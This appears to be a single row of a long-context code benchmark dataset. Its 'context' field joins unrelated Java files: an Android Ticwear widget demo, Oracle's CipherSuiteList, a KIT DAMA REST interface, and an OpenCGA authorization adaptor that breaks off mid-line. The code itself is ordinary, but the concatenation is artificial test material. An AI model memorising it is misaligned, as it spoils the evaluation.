gt
stringclasses
1 value
context
stringlengths
2.05k
161k
/* * Copyright (c) 2016 Mobvoi Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.mobvoi.design.demo.fragments; import android.animation.ValueAnimator; import android.animation.ValueAnimator.AnimatorUpdateListener; import android.app.Dialog; import android.content.Context; import android.content.DialogInterface; import android.content.DialogInterface.OnShowListener; import android.support.annotation.NonNull; import android.support.annotation.StringRes; import android.view.LayoutInflater; import android.view.View; import android.widget.TextView; import android.widget.Toast; import com.ticwear.design.demo.R; import ticwear.design.app.AlertDialog; import ticwear.design.drawable.CircularProgressDrawable; import ticwear.design.widget.FloatingActionButton; import ticwear.design.widget.FloatingActionButton.DelayedConfirmationListener; import ticwear.design.widget.SwipeTodoView; import ticwear.design.widget.VolumeBar; /** * Created by tankery on 1/12/16. * * fragment for test */ public class WidgetsFragment extends ListFragment { @Override protected int[] getItemTitles() { return new int[]{ R.string.category_widgets_fab, R.string.category_widgets_fab_delay, R.string.category_widgets_button, R.string.category_widgets_volume_bar, R.string.category_widgets_swipe_todo, R.string.category_widgets_picker, R.string.category_widgets_progress, R.string.category_widgets_loading, }; } @Override public void onTitleClicked(View view, @StringRes int titleResId) { Dialog dialog = createDialog(view.getContext(), titleResId); if (dialog != null) { dialog.show(); } } private Dialog createDialog(final Context context, int resId) { Dialog dialog = null; LayoutInflater inflater = (LayoutInflater) context.getSystemService(Context.LAYOUT_INFLATER_SERVICE); switch (resId) { case R.string.category_widgets_fab: dialog = createFABDialog(context, inflater); break; case R.string.category_widgets_fab_delay: { dialog = createFABDelayConfirmDialog(context, inflater); break; } case R.string.category_widgets_button: { dialog = new AlertDialog.Builder(context, ticwear.design.R.style.Theme_Ticwear_Dialog_Alert_Datetime) .setTitle(R.string.category_widgets_button) .setView(R.layout.widgets_btn_list) .create(); break; } case R.string.category_widgets_volume_bar: dialog = createVolumeBarDialog(context, inflater); break; case R.string.category_widgets_swipe_todo: dialog = createSwipeTodoDialog(context, inflater); break; case R.string.category_widgets_picker: break; case R.string.category_widgets_progress: break; case R.string.category_widgets_loading: dialog = createClockLoadingDialog(context, inflater); break; } return dialog; } @NonNull private Dialog createFABDialog(Context context, LayoutInflater inflater) { View layout = inflater.inflate( R.layout.widgets_fab_scroll, null); final FloatingActionButton fab = (FloatingActionButton) layout.findViewById(R.id.fab); View.OnClickListener listener = new View.OnClickListener() { boolean isShow = true; @Override public void onClick(View v) { if (isShow) { fab.minimize(); } else { fab.show(); } isShow = !isShow; } }; layout.findViewById(R.id.text_content) .setOnClickListener(listener); layout.setOnClickListener(listener); fab.setOnClickListener(new View.OnClickListener() { private int clickCount = 0; private ValueAnimator increaseAnimator = ValueAnimator.ofFloat(0, 1) .setDuration(5000); { increaseAnimator.addUpdateListener(new AnimatorUpdateListener() { @Override public void onAnimationUpdate(ValueAnimator animation) { float progress = (float) animation.getAnimatedValue(); fab.setProgressPercent(progress); if (progress >= 1) { onClick(null); } } }); } @Override public void onClick(View v) { clickCount++; int count = clickCount % 3; fab.setShowProgress(count != 0); switch (count) { case 1: fab.setProgressMode(CircularProgressDrawable.MODE_DETERMINATE); increaseAnimator.start(); break; case 2: increaseAnimator.cancel(); fab.setProgressMode(CircularProgressDrawable.MODE_INDETERMINATE); fab.startProgress(); break; default: increaseAnimator.cancel(); break; } } }); Dialog dialog = new Dialog(context); dialog.setContentView(layout); return dialog; } private Dialog createFABDelayConfirmDialog(Context context, LayoutInflater inflater) { View layout = inflater.inflate( R.layout.widgets_fab_scroll, null); final FloatingActionButton fab = (FloatingActionButton) layout.findViewById(R.id.fab); fab.setImageResource(ticwear.design.R.drawable.tic_ic_btn_ok); final TextView content = (TextView) layout.findViewById(R.id.text_content); content.setText(R.string.text_dialog_delay_confirm); Dialog dialog = new Dialog(context); dialog.setContentView(layout); dialog.setOnShowListener(new OnShowListener() { @Override public void onShow(DialogInterface dialog) { fab.startDelayConfirmation(5000, new DelayedConfirmationListener() { @Override public void onButtonClicked(FloatingActionButton fab) { Toast.makeText(fab.getContext(), "Button clicked", Toast.LENGTH_SHORT).show(); } @Override public void onTimerFinished(FloatingActionButton fab) { Toast.makeText(fab.getContext(), "Timer finished", Toast.LENGTH_SHORT).show(); } }); } }); return dialog; } @NonNull private Dialog createVolumeBarDialog(Context context, LayoutInflater inflater) { Dialog dialog; dialog = new Dialog(context); View layout = inflater.inflate( R.layout.widgets_volume_bar, null); final VolumeBar vBar = (VolumeBar)layout.findViewById(R.id.volume_bar); final TextView tv = (TextView) layout.findViewById(R.id.volume_text); tv.setText(vBar.getProgress()+""); vBar.postDelayed(new Runnable() { @Override public void run() { vBar.setSelected(true); // vBar.setValueColor(Color.RED); } }, 3000); vBar.setOnVolumeChangedListetener(new VolumeBar.OnVolumeChangedListener() { @Override public void onVolumeChanged(VolumeBar volumeBar, int progress, boolean fromUser) { tv.setText(progress+""); } }); dialog.setContentView(layout); return dialog; } @NonNull private Dialog createSwipeTodoDialog(final Context context, LayoutInflater inflater) { final Dialog dialog = new Dialog(context, ticwear.design.R.style.Theme_Ticwear_Dialog_Alert_NonSwipe); View layout = inflater.inflate(R.layout.widgets_swipe_todo, null); SwipeTodoView swipeToDo = (SwipeTodoView) layout.findViewById(R.id.swipe_to_do); swipeToDo.setLeftIconListener(new SwipeTodoView.OnSelectChangedListener() { @Override public void onSelected() { Toast.makeText(context, "Dismissed", Toast.LENGTH_SHORT).show(); dialog.dismiss(); } }); swipeToDo.setRightIconListener(new SwipeTodoView.OnSelectChangedListener() { @Override public void onSelected() { Toast.makeText(context, "Confirmed", Toast.LENGTH_SHORT).show(); dialog.dismiss(); } }); dialog.setContentView(layout); return dialog; } @NonNull private Dialog createClockLoadingDialog(final Context context, LayoutInflater inflater) { Dialog dialog; dialog = new Dialog(context); View layout = inflater.inflate(R.layout.widgets_clock_loading, null); dialog.setContentView(layout); return dialog; } }
/* * Copyright (c) 2002, 2010, Oracle and/or its affiliates. All rights reserved. * DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER. * * This code is free software; you can redistribute it and/or modify it * under the terms of the GNU General Public License version 2 only, as * published by the Free Software Foundation. Oracle designates this * particular file as subject to the "Classpath" exception as provided * by Oracle in the LICENSE file that accompanied this code. * * This code is distributed in the hope that it will be useful, but WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License * version 2 for more details (a copy is included in the LICENSE file that * accompanied this code). * * You should have received a copy of the GNU General Public License version * 2 along with this work; if not, write to the Free Software Foundation, * Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. * * Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA * or visit www.oracle.com if you need additional information or have any * questions. */ package sun.security.ssl; import java.io.*; import java.util.*; import javax.net.ssl.SSLException; /** * A list of CipherSuites. Also maintains the lists of supported and * default ciphersuites and supports I/O from handshake streams. * * Instances of this class are immutable. * */ final class CipherSuiteList { // lists of supported and default enabled ciphersuites // created on demand private static CipherSuiteList supportedSuites, defaultSuites; private final Collection<CipherSuite> cipherSuites; private String[] suiteNames; // flag indicating whether this list contains any ECC ciphersuites. // null if not yet checked. private volatile Boolean containsEC; // for use by buildAvailableCache() and // Handshaker.getKickstartMessage() only CipherSuiteList(Collection<CipherSuite> cipherSuites) { this.cipherSuites = cipherSuites; } /** * Create a CipherSuiteList with a single element. */ CipherSuiteList(CipherSuite suite) { cipherSuites = new ArrayList<CipherSuite>(1); cipherSuites.add(suite); } /** * Construct a CipherSuiteList from a array of names. We don't bother * to eliminate duplicates. * * @exception IllegalArgumentException if the array or any of its elements * is null or if the ciphersuite name is unrecognized or unsupported * using currently installed providers. */ CipherSuiteList(String[] names) { if (names == null) { throw new IllegalArgumentException("CipherSuites may not be null"); } cipherSuites = new ArrayList<CipherSuite>(names.length); // refresh available cache once if a CipherSuite is not available // (maybe new JCE providers have been installed) boolean refreshed = false; for (int i = 0; i < names.length; i++) { String suiteName = names[i]; CipherSuite suite = CipherSuite.valueOf(suiteName); if (suite.isAvailable() == false) { if (refreshed == false) { // clear the cache so that the isAvailable() call below // does a full check clearAvailableCache(); refreshed = true; } // still missing? if (suite.isAvailable() == false) { throw new IllegalArgumentException("Cannot support " + suiteName + " with currently installed providers"); } } cipherSuites.add(suite); } } /** * Read a CipherSuiteList from a HandshakeInStream in V3 ClientHello * format. Does not check if the listed ciphersuites are known or * supported. */ CipherSuiteList(HandshakeInStream in) throws IOException { byte[] bytes = in.getBytes16(); if ((bytes.length & 1) != 0) { throw new SSLException("Invalid ClientHello message"); } cipherSuites = new ArrayList<CipherSuite>(bytes.length >> 1); for (int i = 0; i < bytes.length; i += 2) { cipherSuites.add(CipherSuite.valueOf(bytes[i], bytes[i+1])); } } /** * Return whether this list contains the given CipherSuite. */ boolean contains(CipherSuite suite) { return cipherSuites.contains(suite); } // Return whether this list contains any ECC ciphersuites boolean containsEC() { if (containsEC == null) { for (CipherSuite c : cipherSuites) { switch (c.keyExchange) { case K_ECDH_ECDSA: case K_ECDH_RSA: case K_ECDHE_ECDSA: case K_ECDHE_RSA: case K_ECDH_ANON: containsEC = true; return true; default: break; } } containsEC = false; } return containsEC; } /** * Return an Iterator for the CipherSuites in this list. */ Iterator<CipherSuite> iterator() { return cipherSuites.iterator(); } /** * Return a reference to the internal Collection of CipherSuites. * The Collection MUST NOT be modified. */ Collection<CipherSuite> collection() { return cipherSuites; } /** * Return the number of CipherSuites in this list. */ int size() { return cipherSuites.size(); } /** * Return an array with the names of the CipherSuites in this list. */ synchronized String[] toStringArray() { if (suiteNames == null) { suiteNames = new String[cipherSuites.size()]; int i = 0; for (CipherSuite c : cipherSuites) { suiteNames[i++] = c.name; } } return suiteNames.clone(); } public String toString() { return cipherSuites.toString(); } /** * Write this list to an HandshakeOutStream in V3 ClientHello format. */ void send(HandshakeOutStream s) throws IOException { byte[] suiteBytes = new byte[cipherSuites.size() * 2]; int i = 0; for (CipherSuite c : cipherSuites) { suiteBytes[i] = (byte)(c.id >> 8); suiteBytes[i+1] = (byte)c.id; i += 2; } s.putBytes16(suiteBytes); } /** * Clear cache of available ciphersuites. If we support all ciphers * internally, there is no need to clear the cache and calling this * method has no effect. */ static synchronized void clearAvailableCache() { if (CipherSuite.DYNAMIC_AVAILABILITY) { supportedSuites = null; defaultSuites = null; CipherSuite.BulkCipher.clearAvailableCache(); JsseJce.clearEcAvailable(); } } /** * Return the list of all available CipherSuites with a priority of * minPriority or above. * Should be called with the Class lock held. */ private static CipherSuiteList buildAvailableCache(int minPriority) { // SortedSet automatically arranges ciphersuites in default // preference order Set<CipherSuite> cipherSuites = new TreeSet<CipherSuite>(); Collection<CipherSuite> allowedCipherSuites = CipherSuite.allowedCipherSuites(); for (CipherSuite c : allowedCipherSuites) { if ((c.allowed == false) || (c.priority < minPriority)) { continue; } if (c.isAvailable()) { cipherSuites.add(c); } } return new CipherSuiteList(cipherSuites); } /** * Return supported CipherSuites in preference order. */ static synchronized CipherSuiteList getSupported() { if (supportedSuites == null) { supportedSuites = buildAvailableCache(CipherSuite.SUPPORTED_SUITES_PRIORITY); } return supportedSuites; } /** * Return default enabled CipherSuites in preference order. */ static synchronized CipherSuiteList getDefault() { if (defaultSuites == null) { defaultSuites = buildAvailableCache(CipherSuite.DEFAULT_SUITES_PRIORITY); } return defaultSuites; } }
/** * Copyright (C) 2014 Karlsruhe Institute of Technology * * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ package edu.kit.dama.rest.dataworkflow.services.interfaces; import com.qmino.miredot.annotations.ReturnType; import com.sun.jersey.api.core.HttpContext; import edu.kit.dama.mdm.dataworkflow.interfaces.IDefaultDataWorkflowConfiguration; import edu.kit.dama.mdm.dataworkflow.interfaces.IDefaultDataWorkflowTask; import edu.kit.dama.mdm.dataworkflow.interfaces.IDefaultExecutionEnvironment; import edu.kit.dama.rest.base.ICommonRestInterface; import edu.kit.dama.rest.base.IEntityWrapper; import edu.kit.dama.util.Constants; import javax.ws.rs.DefaultValue; import javax.ws.rs.FormParam; import javax.ws.rs.GET; import javax.ws.rs.POST; import javax.ws.rs.Path; import javax.ws.rs.PathParam; import javax.ws.rs.Produces; import javax.ws.rs.QueryParam; import javax.ws.rs.core.MediaType; /** * * @author mf6319 */ @Path("/rest/dataworkflow") public interface IDataWorkflowRestService extends ICommonRestInterface { /** * Get a DataWorkflow task by its id. * * @summary Get a DataWorkflow task by its id. * * @param groupId The id of the group used to access the task. * @param id The id of the task. * @param hc The HttpContext for OAuth check. * * @return An DataWorkflowTaskWrapper object. * * @see edu.kit.dama.rest.dataworkflow.types.DataWorkflowTaskWrapper */ @GET @Path(value = "/tasks/{id}") @Produces({MediaType.APPLICATION_XML, MediaType.APPLICATION_JSON}) @ReturnType("edu.kit.dama.rest.base.IEntityWrapper<edu.kit.dama.mdm.dataworkflow.interfaces.IDefaultDataWorkflowTask>") IEntityWrapper<? extends IDefaultDataWorkflowTask> getTaskById( @QueryParam("groupId") @DefaultValue(Constants.USERS_GROUP_ID) String groupId, @PathParam("id") Long id, @javax.ws.rs.core.Context HttpContext hc); /** * Get all accessible DataWorkflow tasks. * * @summary Get all accessible DataWorkflow tasks. * * @param groupId The id of the group used to access the tasks. * @param first The first task index. * @param results The max. number of results. * @param hc The HttpContext for OAuth check. * * @return A list of DataWorkflowTaskWrapper objects. * * @see edu.kit.dama.rest.dataworkflow.types.DataWorkflowTaskWrapper */ @GET @Path(value = "/tasks/") @Produces({MediaType.APPLICATION_XML, MediaType.APPLICATION_JSON}) @ReturnType("edu.kit.dama.rest.base.IEntityWrapper<edu.kit.dama.mdm.dataworkflow.interfaces.IDefaultDataWorkflowTask>") IEntityWrapper<? extends IDefaultDataWorkflowTask> getAllTasks( @QueryParam("groupId") @DefaultValue(Constants.USERS_GROUP_ID) String groupId, @QueryParam("first") @DefaultValue(Constants.REST_DEFAULT_MIN_INDEX) Integer first, @QueryParam("results") @DefaultValue(Constants.REST_DEFAULT_MAX_RESULTS) Integer results, @javax.ws.rs.core.Context HttpContext hc); /** * Get the number of accessible DataWorkflow tasks. * * @summary Get the number of accessible DataWorkflow tasks. * * @param groupId The id of the group used to access the tasks. * @param hc The HttpContext for OAuth check. * * @return A list of DataWorkflowTaskWrapper objects. * * @see edu.kit.dama.rest.dataworkflow.types.DataWorkflowTaskWrapper */ @GET @Path(value = "/tasks/count/") @Produces({MediaType.APPLICATION_XML, MediaType.APPLICATION_JSON}) @ReturnType("edu.kit.dama.rest.base.IEntityWrapper<edu.kit.dama.mdm.dataworkflow.interfaces.IDefaultDataWorkflowTask>") IEntityWrapper<? extends IDefaultDataWorkflowTask> getTaskCount( @QueryParam("groupId") @DefaultValue(Constants.USERS_GROUP_ID) String groupId, @javax.ws.rs.core.Context HttpContext hc); /** * Create a new DataWorkflow task. Therefor, the following arguments are * needed: * * <ul> * <li>configurationId: The Id of a DataWorkflowTaskConfiguration describing * the task and standard parameters.</li> * <li>environmentId: The Id of the ExecutionEnvironmentConfiguration * responsible for executing the task.</li> * <li>predecessorId: The Id of the DataWorkflowTask that is predecessor of * this task. This parameter is optional.</li> * <li>inputObjectMap: A map of input object id (key) and an associated data * organization view name (value). The format of this string can be either * in the form * <i>1=default\n2=customView</i> or * <i>[{"1":"default"},{"2":"customView"}]</i>. Furthermore, the baseId as * well as the digitalObjectIdentifier are supported as keys. * </li> * <li>executionSettings: A map of custom execution settings. The according * properties file will be stored in the working directory of the task * execution and can be read by the user application. The format of this * string can be either in the form * <i>key1=value1\nkey2=value2</i> or * <i>[{"key1":"value1"},{"key2":"value2"}]</i> * This argument should be optional in most cases.</li> * <li>applicationArguments: Custom application arguments that are provided * during the user application execution. The value can be provided as space * separated string. This argument should be optional in most cases.</li> * </ul> * * After successful creation the task execution will be performed within one * of the next processing cycles. As the processing of each task takes * multiple processing cycles a regular check of the task status will be * necessary. * * @summary Create a new DataWorkflow task. * * @param groupId The id of the group the node belongs to. * @param investigationId The investigation the output object of the task is * assigned to. * @param configurationId The task configuration id. * @param environmentId The execution environment configuration id. * @param predecessorId The predecessor task id. * @param inputObjectMap The input object map. * @param executionSettings The execution settings map. * @param applicationArguments The application arguments. * * @param hc The HttpContext for OAuth check. * * @return A DataWorkflowTaskWrapper object. * * @see edu.kit.dama.rest.dataworkflow.types.DataWorkflowTaskWrapper */ @POST @Path(value = "/tasks/") @Produces({MediaType.APPLICATION_XML, MediaType.APPLICATION_JSON}) @ReturnType("edu.kit.dama.rest.base.IEntityWrapper<edu.kit.dama.mdm.dataworkflow.interfaces.IDefaultDataWorkflowTask>") IEntityWrapper<? extends IDefaultDataWorkflowTask> createTask( @FormParam("groupId") @DefaultValue(Constants.USERS_GROUP_ID) String groupId, @FormParam("investigationId") Long investigationId, @FormParam("configurationId") Long configurationId, @FormParam("environmentId") Long environmentId, @FormParam("predecessorId") Long predecessorId, @FormParam("inputObjectMap") String inputObjectMap, @FormParam("executionSettings") String executionSettings, @FormParam("applicationArguments") String applicationArguments, @javax.ws.rs.core.Context HttpContext hc); /** * Get a task configurations by its id. * * @summary Get a task configuration by its id. * * @param groupId The id of the group the task configurations belong to * (default: USERS). * @param id The id of the task configuration. * @param hc The HttpContext for OAuth check. * * @return A DataWorkflowTaskConfigurationWrapper object containing all * results. * * @see * edu.kit.dama.rest.dataworkflow.types.DataWorkflowTaskConfigurationWrapper */ @GET @Path(value = "/configurations/{id}") @Produces({MediaType.APPLICATION_XML, MediaType.APPLICATION_JSON}) @ReturnType("edu.kit.dama.rest.base.IEntityWrapper<edu.kit.dama.mdm.dataworkflow.interfaces.IDefaultDataWorkflowConfiguration>") IEntityWrapper<? extends IDefaultDataWorkflowConfiguration> getTaskConfigurationById( @QueryParam("groupId") @DefaultValue(Constants.USERS_GROUP_ID) String groupId, @PathParam("id") Long id, @javax.ws.rs.core.Context HttpContext hc); /** * Get all task configurations accessible by the group with the id * <i>groupId</i> beginning with index * <i>first</i>. The max. number of results is defined by <i>results</i>. * * @summary Get all task configurations. * * @param groupId The id of the group the task configurations belong to * (default: USERS). * @param first The first index (default: 0). * @param results The max. number of results (default: 10). * @param hc The HttpContext for OAuth check. * * @return A DataWorkflowTaskConfigurationWrapper object containing all * results. * * @see * edu.kit.dama.rest.dataworkflow.types.DataWorkflowTaskConfigurationWrapper */ @GET @Path(value = "/configurations/") @Produces({MediaType.APPLICATION_XML, MediaType.APPLICATION_JSON}) @ReturnType("edu.kit.dama.rest.base.IEntityWrapper<edu.kit.dama.mdm.dataworkflow.interfaces.IDefaultDataWorkflowConfiguration>") IEntityWrapper<? extends IDefaultDataWorkflowConfiguration> getAllTaskConfigurations( @QueryParam("groupId") @DefaultValue(Constants.USERS_GROUP_ID) String groupId, @QueryParam("first") @DefaultValue(Constants.REST_DEFAULT_MIN_INDEX) Integer first, @QueryParam("results") @DefaultValue(Constants.REST_DEFAULT_MAX_RESULTS) Integer results, @javax.ws.rs.core.Context HttpContext hc); /** * Get the number of task configurations accessible by the group with the id * <i>groupId</i>. * * @summary Get the task configuration count. * * @param groupId The id of the group the task configurations belong to. * @param hc The HttpContext for OAuth check. * * @return A DataWorkflowTaskConfigurationWrapper object containing all * results. * * @see * edu.kit.dama.rest.dataworkflow.types.DataWorkflowTaskConfigurationWrapper */ @GET @Path(value = "/configurations/count/") @Produces({MediaType.APPLICATION_XML, MediaType.APPLICATION_JSON}) @ReturnType("edu.kit.dama.rest.base.IEntityWrapper<edu.kit.dama.mdm.dataworkflow.interfaces.IDefaultDataWorkflowConfiguration>") IEntityWrapper<? extends IDefaultDataWorkflowConfiguration> getTaskConfigurationCount( @QueryParam("groupId") @DefaultValue(Constants.USERS_GROUP_ID) String groupId, @javax.ws.rs.core.Context HttpContext hc); /** * Get an execution environment configurations by its id. * * @summary Get an execution environment configuration by its id. * * @param groupId The id of the group the environment configurations belong * to (default: USERS). * @param id The id of the execution environment configuration. * @param hc The HttpContext for OAuth check. * * @return An ExecutionEnvironmentConfigurationWrapper object containing all * results. * * @see * edu.kit.dama.rest.dataworkflow.types.ExecutionEnvironmentConfigurationWrapper */ @GET @Path(value = "/environments/{id}") @Produces({MediaType.APPLICATION_XML, MediaType.APPLICATION_JSON}) @ReturnType("edu.kit.dama.rest.base.IEntityWrapper<edu.kit.dama.mdm.dataworkflow.interfaces.IDefaultExecutionEnvironment>") IEntityWrapper<? extends IDefaultExecutionEnvironment> getExecutionEnvironmentConfigurationById( @QueryParam("groupId") @DefaultValue(Constants.USERS_GROUP_ID) String groupId, @PathParam("id") Long id, @javax.ws.rs.core.Context HttpContext hc); /** * Get all execution environment configurations accessible by the group with * the id <i>groupId</i> beginning with index * <i>first</i>. The max. number of results is defined by <i>results</i>. * * @summary Get all execution environment configurations. * * @param groupId The id of the group the environment configurations belong * to (default: USERS). * @param first The first index (default: 0). * @param results The max. number of results (default: 10). * @param hc The HttpContext for OAuth check. * * @return An ExecutionEnvironmentConfigurationWrapper object containing all * results. * * @see * edu.kit.dama.rest.dataworkflow.types.ExecutionEnvironmentConfigurationWrapper */ @GET @Path(value = "/environments/") @Produces({MediaType.APPLICATION_XML, MediaType.APPLICATION_JSON}) @ReturnType("edu.kit.dama.rest.base.IEntityWrapper<edu.kit.dama.mdm.dataworkflow.interfaces.IDefaultExecutionEnvironment>") IEntityWrapper<? extends IDefaultExecutionEnvironment> getAllExecutionEnvironmentConfigurations( @QueryParam("groupId") @DefaultValue(Constants.USERS_GROUP_ID) String groupId, @QueryParam("first") @DefaultValue(Constants.REST_DEFAULT_MIN_INDEX) Integer first, @QueryParam("results") @DefaultValue(Constants.REST_DEFAULT_MAX_RESULTS) Integer results, @javax.ws.rs.core.Context HttpContext hc); /** * Get the number of execution environment configurations accessible by the * group with the id <i>groupId</i>. * * @summary Get the execution environment configuration count. * * @param groupId The id of the group the environment configurations belong * to. * @param hc The HttpContext for OAuth check. * * @return An ExecutionEnvironmentConfigurationWrapper object containing all * results. * * @see * edu.kit.dama.rest.dataworkflow.types.ExecutionEnvironmentConfigurationWrapper */ @GET @Path(value = "/environments/count/") @Produces({MediaType.APPLICATION_XML, MediaType.APPLICATION_JSON}) @ReturnType("edu.kit.dama.rest.base.IEntityWrapper<edu.kit.dama.mdm.dataworkflow.interfaces.IDefaultExecutionEnvironment>") IEntityWrapper<? extends IDefaultExecutionEnvironment> getExecutionEnvironmentConfigurationCount( @QueryParam("groupId") @DefaultValue(Constants.USERS_GROUP_ID) String groupId, @javax.ws.rs.core.Context HttpContext hc); }
/* * Copyright 2015-2020 OpenCB * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.opencb.opencga.catalog.db.mongodb; import com.mongodb.MongoClient; import com.mongodb.client.ClientSession; import com.mongodb.client.model.Aggregates; import com.mongodb.client.model.Filters; import com.mongodb.client.model.Projections; import org.apache.commons.lang3.StringUtils; import org.bson.Document; import org.bson.conversions.Bson; import org.opencb.commons.datastore.core.DataResult; import org.opencb.commons.datastore.core.Query; import org.opencb.commons.datastore.core.QueryOptions; import org.opencb.commons.datastore.core.QueryParam; import org.opencb.commons.datastore.mongodb.MongoDBCollection; import org.opencb.commons.datastore.mongodb.MongoDBIterator; import org.opencb.commons.utils.CollectionUtils; import org.opencb.opencga.catalog.auth.authorization.AuthorizationDBAdaptor; import org.opencb.opencga.catalog.auth.authorization.AuthorizationManager; import org.opencb.opencga.catalog.auth.authorization.CatalogAuthorizationManager; import org.opencb.opencga.catalog.db.DBAdaptorFactory; import org.opencb.opencga.catalog.db.api.StudyDBAdaptor; import org.opencb.opencga.catalog.exceptions.CatalogAuthorizationException; import org.opencb.opencga.catalog.exceptions.CatalogDBException; import org.opencb.opencga.catalog.exceptions.CatalogException; import org.opencb.opencga.catalog.exceptions.CatalogParameterException; import org.opencb.opencga.core.config.Configuration; import org.opencb.opencga.core.models.common.Enums; import org.opencb.opencga.core.models.study.PermissionRule; import org.opencb.opencga.core.models.study.Study; import org.opencb.opencga.core.response.OpenCGAResult; import org.slf4j.LoggerFactory; import java.util.*; import java.util.regex.Pattern; import java.util.stream.Collectors; import static org.opencb.commons.datastore.core.QueryParam.Type.INTEGER_ARRAY; import static org.opencb.commons.datastore.core.QueryParam.Type.TEXT_ARRAY; /** * Created by pfurio on 20/04/17. */ public class AuthorizationMongoDBAdaptor extends MongoDBAdaptor implements AuthorizationDBAdaptor { private Map<Enums.Resource, MongoDBCollection> dbCollectionMap = new HashMap<>(); private static final String ANONYMOUS = "*"; static final String MEMBER_WITH_INTERNAL_ACL = "_withInternalAcls"; public AuthorizationMongoDBAdaptor(DBAdaptorFactory dbFactory, Configuration configuration) throws CatalogDBException { super(configuration, LoggerFactory.getLogger(AuthorizationMongoDBAdaptor.class)); this.dbAdaptorFactory = (MongoDBAdaptorFactory) dbFactory; initCollectionConnections(); } enum QueryParams implements QueryParam { ID("id", INTEGER_ARRAY, ""), ACL("_acl", TEXT_ARRAY, ""), USER_DEFINED_ACLS("_userAcls", TEXT_ARRAY, ""); private static Map<String, QueryParams> map = new HashMap<>(); static { for (QueryParams param : QueryParams.values()) { map.put(param.key(), param); } } private final String key; private Type type; private String description; QueryParams(String key, Type type, String description) { this.key = key; this.type = type; this.description = description; } @Override public String key() { return key; } @Override public Type type() { return type; } @Override public String description() { return description; } public static Map<String, QueryParams> getMap() { return map; } public static QueryParams getParam(String key) { return map.get(key); } } private void initCollectionConnections() { this.dbCollectionMap.put(Enums.Resource.STUDY, dbAdaptorFactory.getCatalogStudyDBAdaptor().getStudyCollection()); this.dbCollectionMap.put(Enums.Resource.COHORT, dbAdaptorFactory.getCatalogCohortDBAdaptor().getCohortCollection()); this.dbCollectionMap.put(Enums.Resource.FILE, dbAdaptorFactory.getCatalogFileDBAdaptor().getCollection()); this.dbCollectionMap.put(Enums.Resource.INDIVIDUAL, dbAdaptorFactory.getCatalogIndividualDBAdaptor().getCollection()); this.dbCollectionMap.put(Enums.Resource.JOB, dbAdaptorFactory.getCatalogJobDBAdaptor().getJobCollection()); this.dbCollectionMap.put(Enums.Resource.SAMPLE, dbAdaptorFactory.getCatalogSampleDBAdaptor().getCollection()); this.dbCollectionMap.put(Enums.Resource.DISEASE_PANEL, dbAdaptorFactory.getCatalogPanelDBAdaptor().getPanelCollection()); this.dbCollectionMap.put(Enums.Resource.FAMILY, dbAdaptorFactory.getCatalogFamilyDBAdaptor().getCollection()); this.dbCollectionMap.put(Enums.Resource.CLINICAL_ANALYSIS, dbAdaptorFactory.getClinicalAnalysisDBAdaptor().getClinicalCollection()); } private List<String> getFullPermissions(Enums.Resource resource) { List<String> permissionList = new ArrayList<>(resource.getFullPermissionList()); permissionList.add("NONE"); return permissionList; } private void validateEntry(Enums.Resource entry) throws CatalogDBException { switch (entry) { case STUDY: case COHORT: case INDIVIDUAL: case JOB: case FILE: case SAMPLE: case DISEASE_PANEL: case FAMILY: case CLINICAL_ANALYSIS: return; default: throw new CatalogDBException("Unexpected parameter received. " + entry + " has been received."); } } /** * Internal method to fetch the permissions of every user. Permissions are splitted and returned in a map of user -> list of * permissions. * * @param resourceId Resource id being queried. * @param membersList Members for which we want to fetch the permissions. If empty, it should return the permissions for all members. * @param entry Entity where the query will be performed. * @return A map of [acl, user_defined_acl] -> user -> List of permissions and the string id of the resource queried. */ private EntryPermission internalGet(long resourceId, List<String> membersList, Enums.Resource entry) { EntryPermission entryPermission = new EntryPermission(); List<String> members = (membersList == null ? Collections.emptyList() : membersList); MongoDBCollection collection = dbCollectionMap.get(entry); List<Bson> aggregation = new ArrayList<>(); aggregation.add(Aggregates.match(Filters.eq(PRIVATE_UID, resourceId))); aggregation.add(Aggregates.project( Projections.include(QueryParams.ID.key(), QueryParams.ACL.key(), QueryParams.USER_DEFINED_ACLS.key()))); List<Bson> filters = new ArrayList<>(); if (CollectionUtils.isNotEmpty(members)) { List<Pattern> regexMemberList = new ArrayList<>(members.size()); for (String member : members) { if (!member.equals(ANONYMOUS)) { regexMemberList.add(Pattern.compile("^" + member)); } else { regexMemberList.add(Pattern.compile("^\\*")); } } filters.add(Filters.in(QueryParams.ACL.key(), regexMemberList)); } if (CollectionUtils.isNotEmpty(filters)) { Bson filter = filters.size() == 1 ? filters.get(0) : Filters.and(filters); aggregation.add(Aggregates.match(filter)); } for (Bson bson : aggregation) { logger.debug("Get Acl: {}", bson.toBsonDocument(Document.class, MongoClient.getDefaultCodecRegistry())); } DataResult<Document> aggregate = collection.aggregate(aggregation, null); Map<String, Map<String, List<String>>> permissions = entryPermission.getPermissions(); if (aggregate.getNumResults() > 0) { Set<String> memberSet = new HashSet<>(); memberSet.addAll(members); Document document = aggregate.first(); entryPermission.setId(document.getString(QueryParams.ID.key())); List<String> aclList = (List<String>) document.get(QueryParams.ACL.key()); if (aclList != null) { // If _acl was not 